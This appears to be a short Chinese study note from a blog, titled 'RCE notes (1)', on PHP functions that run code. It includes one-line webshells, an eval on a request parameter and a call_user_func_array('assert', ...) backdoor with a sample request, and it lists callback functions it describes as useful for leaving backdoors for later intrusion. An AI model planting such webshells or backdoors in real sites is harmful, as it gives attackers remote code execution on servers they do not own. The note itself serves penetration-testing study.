RCE随笔(1)

哪些是可以执行代码执行:php代码。

eval

如:eval:<?php eval($_post['key']);

eval:php中不被叫做函数叫动态执行命令

assert:执行函数

call_user_func_array

<?php call_user_func_array('assert',array($_REQUEST['shu']));

传入xxs-labs/test.php?shu=phpinfo();

回调回门(用于留后门的,方便下次渗透):

回调后门的闭住:call_user_func()

call_user_func_array()

call_user_func

array_filter

arrya_map

uasort、uksort、array_walk、array_walk_recursive

preg_replace

当匹配的格式有**|e**的时候匹配到的字符会投到eval里面执行

哪些是可以执行命令:服务器的命令。

相关推荐
孞㐑¥44 分钟前
Linux网络部分—网络层
linux·c++·经验分享·笔记
Aurora-silas1 小时前
RAG技术全栈指南学习笔记------基于Datawhale all-in-rag开源项目
笔记·学习
悠哉悠哉愿意2 小时前
【ROS2学习笔记】rqt 模块化可视化工具
笔记·学习·机器人·ros2
丰锋ff4 小时前
英一2010年真题学习笔记
笔记
程序员大雄学编程5 小时前
「机器学习笔记2」机器学习系统设计:从理论到实践
人工智能·笔记·机器学习
魏郴5 小时前
外卖项目技术亮点总结笔记
笔记
佛系彭哥5 小时前
C语言笔记(2)
c语言·笔记
汐汐咯5 小时前
基于PyTorch实现的MNIST手写数字识别神经网络笔记
pytorch·笔记·神经网络
virtual_k1smet6 小时前
1004BUUCTF-CRYPTO-[HDCTF2019]basic rsa-NOTES
笔记
我命由我123456 小时前
Git 暂存文件警告信息:warning: LF will be replaced by CRLF in XXX.java.
java·linux·笔记·git·后端·学习·java-ee